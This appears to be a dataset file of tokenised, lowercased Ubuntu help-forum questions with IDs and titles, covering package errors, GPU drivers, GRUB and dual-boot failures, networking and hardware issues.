409744	getting error running sudo apt-get -f install	e : waited for /usr/sbin/dpkg-preconfigure -- apt || true but it was n't there e : failure running script /usr/sbin/dpkg-preconfigure -- apt || true i know this question has been asked before but the answer given returns an error . ubuntu version 10.04.3 $ sudo sh -c `` echo 'dpkg : :pre-install-pkgs { `` /usr/sbin/dpkg-pr econfigure -- apt || true '' ; } ; ' > > /etc/apt/apt.conf.d/70debconf '' econfigure : 1 : syntax error : unterminated quoted string sh : true ; } ; ' > > /etc/apt/apt.conf.d/70debconf : not found
409747	ssd slows down six months after install	have a samsung 840 ssd in a thinkpad r60i running xubuntu 13.04 /w 3gb usable ram . provisioned it with 20 % free space and enabled trim , and it was fast as greased lightning to start , but four months later it takes three times longer to boot . only down to 30 % free in my ext3 file system and only installed 500mb of apps since install . i have seen slow samsung 830 ssd ! and did update the firmware before install .
409748	errors while installing cmake on ubuntu 12.10	while installing cmake i am getting errors ... could not find bzip2 ( missing : bzip2_libraries bzip2_include_dir ) -- could not find libarchive ( missing : libarchive_library libarchive_include_dir ) cmake error at cmakelists.txt:332 ( message ) : cmake_use_system_libarchive is on but libarchive is not found ! call stack ( most recent call first ) : cmakelists.txt:514 ( cmake_build_utilities ) -- configuring incomplete , errors occurred ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - error when bootstrapping cmake : problem while running initial cmake -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -
409750	how to setup wireless in a dell latitude d430 ?	i am trying to get wireless internet on this dell latitude d430 . what can i do ?
409753	restricted video drivers livecd vs full install	when booting to a live cd of ubuntu 12.04 no restricted video drivers are detected . however , after completing a full instillation restricted video drivers are found . does anyone know why this is happening ? and how i can get the livecd to detect and find the restricted drivers ? lspci produces the same results for both livecd and full installs . proprietary drivers for devices ( restricted ) and software restricted by copyright are both checked for software sources when running a livecd . unity is running in 2d . the graphics card : radeon hd 7770
409756	ubuntu as a proxy stop to comunicate to the other computers	first , i will try to describe the scenario : i have an ubuntu server 13 as a proxy to the internet for many other network´s equipment . in this proxy there two network cards , one of them is binds directly to a dedicated link to the internet provider . is also configured in this ubuntu a pretty basic iptables . now my problem : suddenly ( i not yet noticed a pattern for this event and also i have not found anything in the logs that could provide me some clue ) all equipment lost communication with the proxy . even the ping command does not find the proxy´s network cards . and this ubuntu machine also can´t ping to the other network equipment . however , this has not lost the connection to the internet . my thanks to this community that helps a lot and if anyone has experienced similar problem and could share the solution ...
409759	linux adobe flash player youtube videos sound distorted	when i just start my computer , youtube videos work fine . however , after working for some time ( might be related to suspend session ) , youtube videos do n't work good anymore . they are very non-fluent : the sound is distorted but it seems like the video itself is doing well . i tried to install the new adobe flash version but this did n't help . i tried to manually kill the adobe flash plugin , but this did n't help either . what does help is rebooting my computer , but off course i do n't want to do that again and again . has anyone got an idea why the sound is distorted ? or even better , has anyone got an idea how to fix the sound without a reboot ? thank you very much !
409760	grub rescue error on windows 7	i have a dual boot system with ubuntu and windows 7 . it is an old laptop with bios ( not uefi ) . i tried to remove ubuntu from the system for experimentation . what i did was that i opened the disk management in windows and deleted the partition containing ubuntu . now , i thought that on restart , windows 7 would start . but instead it shows grub rescue and `` no such partition '' . the error is obvious since there actually is n't a partition for ubuntu . is there a way i can directly boot windows and not go through the grub of ubuntu . my laptop is relatively old and does not have a separate recovery drive .
409761	how do i use a ps3 sixaxis controller with ubuntu 13.10 to control games	i need to know so i do n't have to use clunky mouse and keyboard controls . i have n't tried this yet , and have no idea where to start .
409767	how do i config a foscam fi9821w ip camera on firefox	i 'm running ubuntu 12.04 and firefox . i 've got a foscam fi9821w ip camera and i 'm trying to get live video on firefox . then i want to add to zoneminder . i opened the ipcam client page and downloaded and installed the plugin as prompted , hit `` login '' and there was the next page of the ipcam client . no live video , like the foscam users manual said . is there something wrong with the plugin ? i 've been reading online that foscam does n't really support linux , like they claim . i managed to add the camera to zoneminder , but the ip address is red and not orange like it should be . which means it 's not working . has anyone had experience with foscam hd cameras ? can someone help me ?
409769	how can i enable ati2100 onboard graphics in ubuntu12.10	please help me . i am new to ubuntu my system will slowly running on ubuntu . but other os 's like win xp,7,8 running good . why ubuntu will get stuck on my pc how can i instal on board graphics driver for ubuntu12.0 please help me my system configuration processor : amd sempron 145 processor 2.8ghz ram : 4gb hard disk : 500gb my mother board config : foxconn socket : am3 plat form : amd chip-set : amd 740g model : a74ml-k 3.0 /a74ml 3.0 the ati radeonâ˘ 2100 graphics engine with on-board . am installed mesa-utils by typing : sudo apt-get install mesa-utils it shows the grphic name but the system will perform slow . how can i fix it please provide me an right answer . my email : srinivas.pt54 @ gmail.com thanking you sir/mam yours faithfully puppala srinivasarao
409774	ubuntu web server processor ?	i am thinking of building a home based web server built on ubuntu and am curious as to if the following processor will be able to handle ubuntu server . intel dual-core celeron 1037u ( 1.8ghz ) ( http : //www.newegg.com/product/product.aspx ? item=n82e16813128679 ) i am also going to have : 4 gb of ddr3 ram and 1tb hdd 7200 rpm what do you guys think ? i want to set up a lamp environment , i feel like this will help me learn linux and be able to host my own personal web server . thank you !
409775	gnome/unity apps - > fluxbox	where could i find a list of all the commands used to execute the apps in gnome/unity so i can add them to my fluxbox menus ? i.e . user accounts/package manager/etc .
409796	minimize internet bandwidth usage	i am traveling and using a 3g mobile internet provider , it has limit of 3gb download every 7 days . so i was wondering what tweaks can i apply in ubuntu 12.04.3 to minimize internet usage . i already disabled flash and images on my browser , but what else could i do . are there some programs that use bandwidth on the background i can disable or any other tips ?
409800	running xrandr with pam_exec	can anyone tell me why xrandr does n't work when i run it using pam_exec ? i 'm having the same issue as 12.04 resolution changes on lock + kvm only in 13.10 , but i think i 'm close to a solution . it 's just not quite working and i 'm stuck . i wrote the following script and put it in /usr/bin/local/fixscreenres.sh # ! /bin/sh touch /tmp/itexecuted xrandr -- output dp-2 -- primary -- mode 1920x1080 & & touch /tmp/xrandrran i then added the following to /etc/pam.d/gnome-screensaver auth optional pam_exec.so /usr/local/bin/fixscreenres.sh i know that the script is running because the itexecuted file gets updated in /tmp , but for some reason the xrandr command fails to update the screen resolution when it 's run this way . i see the following in /var/log/auth.log jan 23 14:46:08 localmachine gnome-screensaver-dialog : pam_unix ( gnome-screensaver : auth ) : authentication failure ; logname= uid=2109 euid=2109 tty=:0.0 ruser= rhost= user=kc164 jan 23 14:46:08 localmachine gnome-screensaver-dialog : gkr-pam : unlocked login keyring jan 23 14:46:08 localmachine gnome-screensaver-dialog : pam_exec ( gnome-screensaver : auth ) : /usr/local/bin/fixscreenres.sh failed : exit code 1 jan 23 14:46:08 localmachine gnome-screensaver-dialog : pam_exec ( gnome-screensaver : auth ) : conversation failed
409810	ipatbles & dynamic ip	so i 've done some research on using a dynamic ip with iptables . it appears that you can use a domain name like example.dyndns.org . the man page for iptables says it is a bad idea to use domain names but i have n't seen anyone explain why . in fact , from what i 've read iptables will resolve example.dyndns.org to an ip and replace the domain name with the ip in the rules but only once , when iptables starts up . there are a number of scripts of varying complexity out there - most in bash , one or two in python - that are meant to check the ip of the specified domain name , then check the current ip vs the last ip found , and finally update iptables only if the 2 ips are different . some of these scripts flush iptables and reload , others use iptables-restore , others simply hard code the line number where the dynamic ip goes and replace that line . now here comes the ( potentially ) stupid question ... if iptables will resolve the ip of the domain name when it starts why not simply put the domain name into the iptables rules and restart iptables once an hour ? would it be better to run iptables-restore once an hour ? ( will that re-resolve the domain name to an ip each time or leave me with the old ip ? ) note : my last question on this topic got downvoted without comment . i have no idea why . if you are going to downvote at least leave a comment to let me know what i did wrong ( wrong forum , have n't done enough research , etc ) so i do n't repeat the mistake . thanks
409811	ca n't install ubuntu phone - click package missing	i tried installing ubuntu phone from my ubuntu 12.04 64-bit but i am unable to install phablet-tools because of a dependency on the package click which i ca n't figure out where it 's supposed to come from . i am following the official guide at ubuntu.com/phone/install , i 've added the repo but i am unable to install : the following packages have unmet dependencies : phablet-tools : depends : click but it is not installable recommends : ubuntu-dev-tools but it is not going to be installed` e : unable to correct problems , you have held broken packages . any ideas on where i can get the click package ?
409813	specifying python distribution in ubuntu 13.10 ( for continuum anaconda python )	i 've been trying to install python on my ubuntu 13.10 vm . ubuntu already comes with python , and when i remove it with apt a lot of other apps get removed . i have installed continuum 's anaconda python in /usr/local/bin/anaconda , but when i run python from the terminal , i can not import modules that come with anaconda . how do i fix this so that i use anaconda python and can i remove the other 2.7.5 edition of python in favour of anaconda ? this has already been added to the .bashrc : # added by anaconda 1.8.0 installer export path= '' /usr/local/bin/anaconda/bin : $ path ''
409814	ubuntu 12.04 + software raid = error : unknown filesystem , grub rescue ( uefi )	i 'm posting here for the first time , though reading this site looking for solutions almost every day . i 'm trying to install ubuntu 12.04.3 with soft-raid on a ibm server with uefi support . after the installer reboot it fails with grub error : unknown filesystem . if i put the hdds to another machine ( a generic pc without uefi ) it boots correctly . i suspect it 's either an issue with the uefi/legacy modes or with the hardware in some way , though may be the installer failed to detect/configure something and it should be fixed manually . here are the details . the ibm server : brand new ibm system x3100 m4 , firmware v1.07 , imm v3.65 ( up-to-date ) intel xeon e3-1240v2 @ 3.4ghz 8gb ecc ram ( all memtests ok ) 2 x sata 1tb wd re4 ( wd1003fbyz ) the system has a fake-raid , but it is disabled in the bios ( configure sata as : ahci ) . the generic pc : asus p5kpl intel pentium 4 4gb ram same hdds from the ibm server the intended install : ubuntu 12.04.3 alternate x64 ( ubuntu-12.04.3-alternate-amd64.iso ) raid1 for /boot ( 100mb ) raid1 for / ( 10gb ) no lvm ( the separation of /boot and / is actually for luks to be installed on top of the / raid array , but this is another issue ) the firmware of the ibm server supports uefi in some awkward way : it boots the install cd in legacy/mbr and hdds/usb storage in uefi with some fallback to mbr . there is no way to change it or fine-tune it somehow ( or at least i did n't figure out how ) . tried both on the ibm server : image burned on a cd ( installs in legacy ( mbr ) , partition table msdos ) and on a usb memory ( installs in uefi , partition table gpt with ebp ) . both produce the grub rescue error . same install on the generic pc ( or disks with the install on the ibm server moved to the generic pc ) boots correctly . here is how i install it ( from a cd , in legacy ( mbr ) mode ) : expert mode , default/basic options in the first steps up to partition disks . there i recreate an empty partition table ( msdos ) on both hdds , then , after creating/setting everything , it looks this way : raid1 device # 0 - 98.4 mb linux software raid array > # 1 98.4 mb f ext4 /boot raid1 device # 1 - 10.0 gb linux software raid array > # 1 10.0 gb f ext4 / scsi1 ( 0,0,0 ) ( sda ) - 1.0 tb ata wdc wd1003fbyz-0 > # 1 primary 98.6 mb b k raid > # 2 primary 10.0 gb k raid > pri/log 990.1 gb free space scsi3 ( 0,0,0 ) ( sdb ) - 1.0 tb ata wdc wd1003fbyz-0 > # 1 primary 98.6 mb b k raid > # 2 primary 10.0 gb k raid > pri/log 990.1 gb free space do you want to boot your system if your raid becomes degraded ? - > yes no swap ( there is no need for it in my case , and it should not affect the boot process ) . the rest of the steps are also completed with the default options ( kernel : linux-generic-lts-raring , drivers : generic/targeted ( tried both ) , software : none ) . install the grub boot loader to the master boot record ? - > yes running `` grub-install /dev/sda /dev/sdb '' ... reboot error : unknown filesystem grub rescue > if i enter there ( this is on the ibm server ) : grub rescue > insmod part_msdos grub rescue > insmod normal grub rescue > normal the system boots correctly.. sometimes.. and sometimes it just reboots seconds after the last line entered ( grub rescue > normal ) , as if ctrl+alt+del pressed . and once i 've even seen unaligned pointer 0xbf099492 . [ hmm , 32-bit address in 64-bit install ? ? ] aborted . press any key to exit . when it does boot , there is a delay of some 15s after pressing enter on the last line and before it starts accessing the hdds for the boot sequence . please note : all ( quick and full with 7 passes ) memory tests ( in the bios and memtest86+ of the install cd ) complete without errors and the same install but without raid ( same /boot and / partitions on one hdd ) boots correctly . looks like a problem related to uefi/legacy modes ( could it be that the firmware of the ibm server tries to boot the system in uefi mode and grub , expecting gpt , does n't load msdos partition table stuff or something similar ? ) , but i do n't have enough grub/initramfs/kernel/uefi knowledge to figure it out . another possibility i see is that the firmware/imm resident code on the ibm server ( which is a hypervisor , sort of a virtual machine that runs without interruptions during the os reboots and halts ) interferes somehow with the boot process ( this would be the worst , unfixable case ) . here is the bootinfo summary from boot-repair ( which actually does n't fix this problem ) executed from a livecd in legacy ( mbr ) mode ( ubuntu-12.04.3-desktop-amd64.iso ) on the ibm server : http : //paste.ubuntu.com/6801133/ . any ideas ? any suggestion how to debug step-by-step the bootloader ? please let me know if additional information is needed . thanks in advance ! p.s . i 've asked the same question on ubuntuforums , here is the link for future if someone encounters the same problem : http : //ubuntuforums.org/showthread.php ? t=2201239 .
409815	fglrx and the broken atieventsd daemon ( +maybe improve your battery life for amd card owners )	i 've been playing about with these things lately , and discovered a couple of things about the fglrx driver on ubuntu that i thought worth sharing in the context of a broader question . the atieventsd daemon is a daemon installed when one installs the proprietary fglrx drivers from amd for an ati discrete gpu . the idea , as i understand it , is to monitor various acpi events , such as a laptop lid close , or an ac connect/disconnect , presumably to let the gpu know for reasons of power saving . see the man page for more info . on my system , ubuntu 13.10 , and with the latest drivers from catalyst , 13.12 , the daemon installs itself at /etc/alternatives/x86_64-linux-gnu_atieventsd with a symlink to that at /usr/bin/atieventsd . problem number 1 : the sys-v-init script , /etc/init.d/atieventsd thinks the symlink is elsewhere , namely /usr/sbin/atieventsd ( i.e . sbin not where it actually is , bin ) so to launch successfully the atieventsd on startup i had to do make the change : daemonpath=/usr/bin/atieventsd it 's also convenient whilst there to add the debugging options , and the additional second log for now : daemonopts= '' -- debug -- logfile=/var/log/atieventsd.log '' then remove/regenerate the run levels : cd /etc/init.d mv atieventsd atieventsd.temp update-rc.d atieventsd remove mv atieventsd.temp atieventsd update-rc.d atieventsd defaults this should now at least allow the daemon to correctly start/stop . you can test with service atieventsd start . problem number 2 : on each startup the daemon attempts to launch a script , /etc/ati/authatieventsd.sh ( by default ) , whose purpose is to grant the atieventsd daemon authorization access to the x server display , so it can send it various commands . this script is called by atieventd like ( see ps aux | grep atieventsd after starting the service or booting ) /etc/ati/authatieventsd.sh grant :0 /tmp/atieventsdgwt098 here argument one ( $ 1 ) is the action : grant/revoke , argument two ( $ 2 ) is the x display number ( e.g :0 ) , and argument three ( $ 3 ) is the file wanting the authority . see the xauth man page for some more background . the problem is that if you look at the /etc/ati/authatieventsd.sh script you will see it does not support lightdm , you need to add the chunk of code inside the getserverauthfile ( ) function : # check lightdm lightdm_auth_file=/var/run/lightdm/root/ $ 1 if [ -e $ lightdm_auth_file ] ; then server_auth_file= $ lightdm_auth_file disp_search_string= '' unix $ 1 '' return 0 fi to allow it find the correct server authentication file . save this and you should see a file in the /tmp directory of the form atieventsdgwt098 , the next time the atieventd is stopped/start ( or next reboot ) , and if you do xauth -f /tmp/atievntx.dh1ajv list you should get something like yourhostname/unix:0 mit-magic-cookie-1 98deg034234kkn34234mmm3242 showing that the daemon has indeed been granted authority . you can also look at the /var/log/atieventsd.log log , and you should see everything is now working correctly , and the daemon is responding to events such as unplugging the ac and lid closes . for example : < dbg > : acpi event : ac_adapter ac 00000080 00000000 < dbg > : acpi event : processor cpu0 00000081 00000000 processor cpu1 00000081 00000000 processor cpu2 00000081 00000000 processor cpu3 00000081 00000000 the broader questions is this atieventsd actually necessary in the modern driver ? is power managed some different way ? has the daemon been succeeded and it was no accident that this thing came broken ? was it really this broken on purpose ? ?
409817	why pcsx2 is n't in the software center and pcsx is ?	i 'd love to emulate a playstation ii in ubuntu , i have some games 'cause my best friend has one , but the emulator pcsx2 is not in the official repository , but pcsx ( for ps1 ) is there . i do n't know if downloading it from its proper repository is safe . thanks .
409818	problem during typing in openoffice.org	i am using usa keyboard layout . now , while i am typing anything in openoffice.org , the numerical keys type the numbers in hindi and the other keys type the letters in english . how to solve the problem ? thanks .
409821	install package for missing libraries	i wrastled with the program according to the info in this question . now it is installed but i ca n't figure out how to run it . a friend running the same version of ubuntu had no problems getting it to start after installing it the same way . this is what i 've done : $ ./psychonauts ./psychonauts : error while loading shared libraries : libstdc++.so.6 : can not open shared object file : no such file or directory so i went ahead and : $ sudo apt-get install libstdc++.so.6 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libstdc++.so.6 e : could n't find any package by regex 'libstdc++.so.6' it should be noted that i only started using linux a few days ago . update okay , so i did manage to install apt-file and apt-file update . however then we hit another snag . usagiyojimbo @ usagi : ~ $ sudo apt-file find libstdc++.so.6 [ sudo ] password for usagiyojimbo : e : the cache is empty . you need to run 'apt-file update ' first . i have done that , when i do it says : file is up-to-date . ignoring source without contents file : a link they wo n't let me post or file is up-to-date . downloading index a link no index available . downloading complete file a link i am still getting the same error when i try to run psychonauts .
409825	key repeat periodically stops working	i 'm assuming this is a low-level bug , but just in case there 's a known fix : i have a logitech wireless k360 . works perfectly fine on both windows and ubuntu most of the time except every now and then key repeat wo n't work on ubuntu . changing the keyboard settings using the standard gnome dialog has no effect ( nor does turning the keyboard off and on again ) ; occasionally it kicks back in on its own a couple minutes later . a reboot always fixes it until it stops working for whatever reason . i 'm on 13.10 but this behaviour has been around at least since 12.10 . any ideas ?
409826	how can i create a bootable *windows* usbstick from a windows .iso	much as i hate it , i have to install windows on my system . i have an .iso file from dreamspark , but no writable dvds or thelike . apparently , there are ways to make bootable windows setup sticks from windows , in order to install on netbooks or such . how do i flash a bootable windows stick from ubuntu ?
409827	mouse click not working in ubuntu , xfce and xubuntu	i have been using xubuntu and ubuntu on our older home pc for almost 2 years without much trouble until today when the mouse seemed to not work properly . i can move the pointer around and click but after a while the left and right click does not work . i can hover over a button and clicking shows the visual effect of lowering the button but it wo n't respond with the action required . it seems to happen sooner when opening a firefox window , but is not restricted to firefox . i have looked on this forum and others for advice and i have tried the following : compiz -- replace metacity -- replace i have even reinstalled the xserver . i checked the ximput to see if the buttons were not assigned but everything seems ok . i am on the 3.2.0-54 kernel and running xubuntu/ubuntu 12.01 . and i have tried different mice on different usb ports and they all do the same thing . help will be much appreciated .
409828	truncated downloads becoming an epidemic for this mobile broadband user	i recently switched from a virgin mobile ( sprint ) 3g dongle to a metropcs ( now t-mobile ) 4g $ ell phone . at about the same time , i switched from vanilla ubuntu 11.10 to ubuntu studio 12.04 ( lts ) , so i 'm unclear as to which change triggered this particular skill deficit in my computer . i know , a smart person changes only one thing at a time . basically , being a nebbish , i initially blamed myself for my connectivity problems and started tweaking network manager , eventually compiling its latest stable from source , and somehow nuked my dbus daemon in the process . at some point i gave up on un-nuking dbus and decided i had backed myself into a `` clean install '' situation , only to be informed that while i was sleeping , support for the ubuntu version i was using had been utterly discontinued . virgin ( this is the detroit market ) became notoriously unreliable concerning connectivity on oct. 31 , 2013 , but at least wget 's -c ( continue where the failed download left off ) option rarely failed me . metropcs , to their credit , has been virtually always available ( connectable ) at some speed ( note that unlimited 4g and tethering and/or hotspot operation are a `` pick one '' proposition with them ) but now when throttled ( and only when throttled ) i can very rarely complete a download over 1mb or so , and can virtually never deal in range headers -- retries are now -always- `` from the top . '' this has been the pattern with firefox as well as wget , so i 've preliminarily ruled out a client problem , assuming it 's either network manager ( which seems to have undergone significant changes between oneiric and precise ) , or the network provider . or a third but seemingly ( to me ) improbable theory that the low latency kernel might have something to do with it . a fourth possibility is that maybe there 's a strong and sudden trend among websites and hosting firms away from range header support . is anyone aware of such a trend ?
409829	partition problems after resizing	this might be quite the hopeless case , so i posted another method that is simpler , but still need some help with . will this backup the partition contents of both linux and windows ? here is the background : i 've recently resized a partition ( /sda2 to make another partition , /sda1 ) on a disk where windows 8 and kde linux mint are installed on . a whole lot of things went wrong . first , the computer would n't boot past bios and gave me grub rescue . with a live linux usb i used the boot-repair app to reinstall grub ( on /sda ) . thankfully linux booted from the new grub2 menu , but windows would crash when trying to load . when looking into it more on linux i found that apps like kde partition manager and gparted both could n't read the partition on my /sda disk . kde partition manager gives me `` no valid partition was found on this device '' . gparted gives me the whole thing is unallocated , and `` unable to satisfy all constraints on the partiton '' . i then installed another app , fixparts . that gave me the following : warning : 0xee partition does n't start on sector 1 . this can cause problems in some oses . and disk size is 250069680 sectors ( 119.2 gib ) mbr disk identifier : 0x0fb1a4fb mbr partitions : can be can be number boot start sector end sector status logical primary code 1 63 192779 primary y y 0x07 2 * 208839 134062424 logical y y 0x07 5 134066176 234067967 logical y y 0x83 6 234067968 250068991 primary y 0x82 fdisk -l gave me this : disk /dev/sda : 128.0 gb , 128035676160 bytes 255 heads , 63 sectors/track , 15566 cylinders , total 250069680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0fb1a4fb device boot start end blocks id system /dev/sda1 63 192779 96358+ 7 hpfs/ntfs/exfat /dev/sda2 * 208839 134062424 66926793 7 hpfs/ntfs/exfat /dev/sda3 134066175 250068991 58001408+ f w95 ext 'd ( lba ) /dev/sda5 134066176 234067967 50000896 83 linux /dev/sda6 234067968 250068991 8000512 82 linux swap / solaris where sda1 is just an empty ntfs partition , sda2 contains my windows 8 , sda5 is linux / ( root ) . /home is on another disk . i want to keep my data . and i want my windows 8 and linux to be on the same disk because it 's an ssd . if possible i would also like both grub and windows boot files to be on the same disk , but that 's a different issue . first i thought the problem was `` 0xee partition does n't start on sector 1 '' , but now i 'm not so sure . my other disks ( i got 3 ) give the same error , but the partition apps can read them . however , i remember seeing the boot-repair app reinstalling grub2 on every disk , so maybe that 's related . also , now i see that windows 8 partition ( /dev/sda2 ) is logical ? ? ? windows can not boot from logical , so it could n't have been before . how can i even change that without loosing the data on it ? really detailed info from boot-repair app .
409832	ubuntu 12.04 crashes on boot after installing nvidia drivers	i 'm fairly new to ubuntu and linux in general . after installing ubuntu and updating it without any problems , i installed the latest nvidia drivers for my graphics card . i restarted the computer and was taken to a black/blank screen . this is where i am stuck . i can not do anything . that includes opening the terminal ( or console ... i 'm not quite sure what the difference is ) .
409835	wifi not getting connected in windows 8 but getting connected in ubuntu . how is this possible ?	i have dell inspiron n4030 laptop . i first installed windows 8 and then ubuntu 12.04 os ( through wubi.exe . http : //www.ubuntu.com/download/desktop/install-ubuntu-with-windows ) in my system . the problem is wireless network adaptor not getting detected in windows 8 . but no such problem was encountered in ubuntu and i was able to connect to wifi . on downloading and installing the dell drivers for windows 7 ( win 8 was not available http : //www.dell.com/support/drivers/us/en/19/product/inspiron-14-n4030 ) i got error dialog boxes showing '' error setup.rul 355 '' '' error setup.rul 342 '' '' driver installation failed could not find the device for this driver '' reliance datacard ( dongles ) is not getting detected in both windows and ubuntu . ubuntu says `` unable to detect modem '' . but the datacard is working on other laptops running windows / ubuntu . bsnl datacard is getting connected in ubuntu on clicking `` set up wireless connection '' ( which appears on inserting the datacard ) under the wifi symbol of ubuntu . but i was not able to connect it in windows 8 . under network drivers in win8 system has broadcom 802.11n network adapter qualcomm atheros ar8152 pci-e fast ethernet controller ( ndis 6.30 ) # 2 and the device status is '' this device is working properly . '' for both drivers i dont know what is the exact problem . googling dint help me much .
409841	sshfs - got access to remote within standard user , but fails with root	i use sshfs to mount a remote hd : sshfs -o idmap=user tducin @ tducin.some.host : /home/tducin/projekty /home/tomasz/development/sshfs/ from my user ( tomasz ) i can see this directory as : drwxrwxr-x 1 tomasz tomasz 4096 2014-01-10 11:17 sshfs but when i log as the root , it looks like this : d ? ? ? ? ? ? ? ? ? ? ? ? ? ? gemius-sshfs root has no access to this directory . therefore , i can not set up an apache virtual host for remote content ( since apache is run from root level ) . what am i doing wrong ? shall i give some extra permissions here ?
409842	bumblebee on kernerl 3.13	i just installed the new 3.13.0-031300 kernel . can i install bumblebee normally , or there will be any issue ? also , every time i update to a new kernel ( manually ) , must i uninstall/reinstall bumblebee and nvidia drivers again ?
409844	how to use ant+ radio in ubuntu touch ?	as the google nexus devices tend to all have ant+ radios in them now , and ubuntu touch currently targets these devices primarily , is there a way to access the ant+ radio and connect and communicate with any ant+ devices , using the ubuntu sdk ? i 'm interested in writing an application for cyclists , but i have not seen any information about how to connect with ant+ on ubuntu touch . are there any documents describing how to do this , either in pure qml or with c++ ?
409846	will i lose my applications and desktop customizations when i upgrade to a new release ?	to begin i must a say that i am a complete noob to any form of linux but am enjoying learning to use ubuntu and finding an alternative to windows . my question is , after having installed 13.10 ( dual boot ) , added programs , and customized it to where it 's a good alternative to win 7 ( for me any way ) , what will happen when i upgrade to 14.x ? will i be able to do the upgrade and not lose my customization or will it be like starting over ?
409848	how can i export user defined dictionarys in libreoffice	how can i export user defined dictionaries in libreoffice ? i want to send a document to someone . the document has many user defined terms . i would like to send the user defined dictionary to that person . i do not know how to . i suspect that i can not , and am asking this question to hopefully have someone consider how to do this .
409849	lenovo thinkpad t530 docked . when ctrl+alt+l is pressed , screen freezes , locks up , and has to be rebooted . when not docked , no issues ... 12.04	i have ran into an issue as of late , not sure if it has something to do with an update , an application i installed , or some crazy voodoo . pretty much like the title describes , when i have my thinkpad t530 docked with a dual monitor setup , it works fine until i have to step away from my pc and lock the screen . when i return , the screen is a faint grayish white . sometimes , it will allow me to enter my password and continue , but mostly it just freezes up and i have to reboot the box . this has caused issues seeing as this is my work machine and i deal with terminal based/web gui cisco related things . i am running gnome fallback ( with and without effects ) but have tried cinnamon , unity , kde , lxde , and xfce which have all produced the same effects . i have purged and cleaned up any and all remnants of those ui 's but i am still having the same issues . i have tried resetting the screen saver , turned off vsync in gnome/unity/compiz , turned off the time out , tried a few answers to other similar questions ( such as this ) . any ideas as to what caused this or how to fix it ? ubuntu 12.04.4 x86_64 linux version 3.8.0-35-generic
409852	lost all desktop icons after trying to reset compiz	help ! i was having some bugs that i suspected to be related to the changes i made in compiz settings . i tried using the command below to reset it ... gconftool -- recursive-unset /apps/compiz-1 i did this and rebooted . after booting , my login screen worked just fine , but when i log in , the launcher on the left and status bar on top do n't display at all ! i have a mouse cursor and i can right click the desktop and whatnot , but i ca n't open any windows ( i tried ctrl+alt+t ) . i know my programs are working though because my desktop wallpaper changes with wallch . i do have access to the non-graphical command line via ctrl+alt+f1 . i 'm currently using proprietary nvidia drivers via the x-swat ppa if that 's at all useful . how can i fix this issue ?
409853	dual boot ubuntu 12.04 / windows 7 system wo n't boot linux	i just tried to install ubuntu 12.04 on my computer . i have a 2t hard drive , and partitioned it so half is windows 7 and half is ubuntu . ubuntu installed without problems , but when i try to boot up the computer to ubuntu i get a black screen . the windows part still works flawlessly , but for some reason the linux part wo n't boot . i am able to boot directly from the cd i used for installation . i 've tried browsing the forums , but i 'm not really sure where to start . i 'm a bit new to this . thanks in advance for any help
409856	where did windows 8 go , can i still access it ?	i just downloaded the latest version of ubuntu 13 and am excited to be in the world of linux and learn more about how this open operating system works . my question is now , where did window 's 8 go . i downloaded unbuntu to a writeable dvd then followed the instructions to to change the uefi settings so that my pc would allow me to install ubuntu ( it was a lot easier then expected ) . my questions are : where is windows 8 now ? is it gone for good ? can i still access it ? how ? thanks !
409860	hdmi audio on default alsa device in xubuntu	my new monitor ( asus mx279 ) have 2 speakers and audio input from hdmi . in xubuntu 12.10 it does n't work by default . i identified the correct device with aplay -l and sound works great with speaker-test -c wav -d plughw:1,7 and aplay -d plughw:1,7 mytest.wav now , how can i set this device ( in this case card 1 , device 7 ) as default audio device ? i 've tried creating ~/.asoundrc like this : pcm . ! default { type hw card 1 device 7 } and restarting alsa with sudo alsa reload , or rebooting system but it did not work . thanks so much .
409862	virtualbox forward specific ip to guest	i have a dedicated server with ubuntu 13.10 installed and a basic installation with virtualbox and phpvirtualbox to manage the guest oss on it . i have two ip addresses pointing to the server and i would like to use one of them purely for a virtual os i have with ubuntu 12.04 on it . this means that every port etc . would pass through the host server and be forwarded straight on to this guest os . i have looked at the different network methods on virtualbox but none seem to be for me . if i use nat and port forwarding i can set the guest pc to only register calls to those ports through that 2nd ip which is great . however i cant use any standard ports that already are in use on the host pc like ssh or 80 as the host pc uses them on both ips how can i get the host os to just pass everything through to a specific guest os for a specific ip ? have i done this wrong and i need to use a different hosting type ? edit : from research and comments it seems bridging should be the way forward but again i am stuck , here is my /etc/network/interfaces file.. # loopback device : auto lo iface lo inet loopback # device : eth0 auto eth0 iface eth0 inet static address 1.2.3.4 broadcast 1.2.3.5 netmask 255.255.255.200 gateway 1.2.3.1 # default route to access subnet up route add -net 1.2.3.6 netmask 255.255.255.220 gw 1.2.3.1 eth0 iface eth0 inet6 static address 2a01:4f8:161:9442 : :2 netmask 64 gateway fe80 : :1 # create bridge using additional ip auto br1 iface br1 inet static address 2.3.4.5 netmask 255.255.255.220 gateway 2.3.4.1 broadcast 2.3.4.7 bridge_ports br1 vbox0 vbox1 the server is a hetzner ex with an additional ip thats on the same mac address ( i can get a different mac from them if needs be ? ) with the above settings i set my win7 guest os to be bridged to br1 and set the ip in windows to be static with the same settings i.e . address 2.3.4.5 netmask 255.255.255.220 gateway 2.3.4.1 but it couldnt pick up a network lastly i have added to /etc/vbox/interfaces : vbox0 vbox br1 vbox1 vbox br1
409868	ca n't install ubuntu alongside windows xp with a usb	i have ubuntu in my usb , so i plug in my dell dimension 3000 ( windows xp sp3 , 500mb ram , hard disk 60gb ) and boot from the usb so i take a look at ubuntu and then i started the setup from ubuntu but there was no option of `` install alongside windows '' it was only the option to create a partition but i want to install ubuntu alongside windows
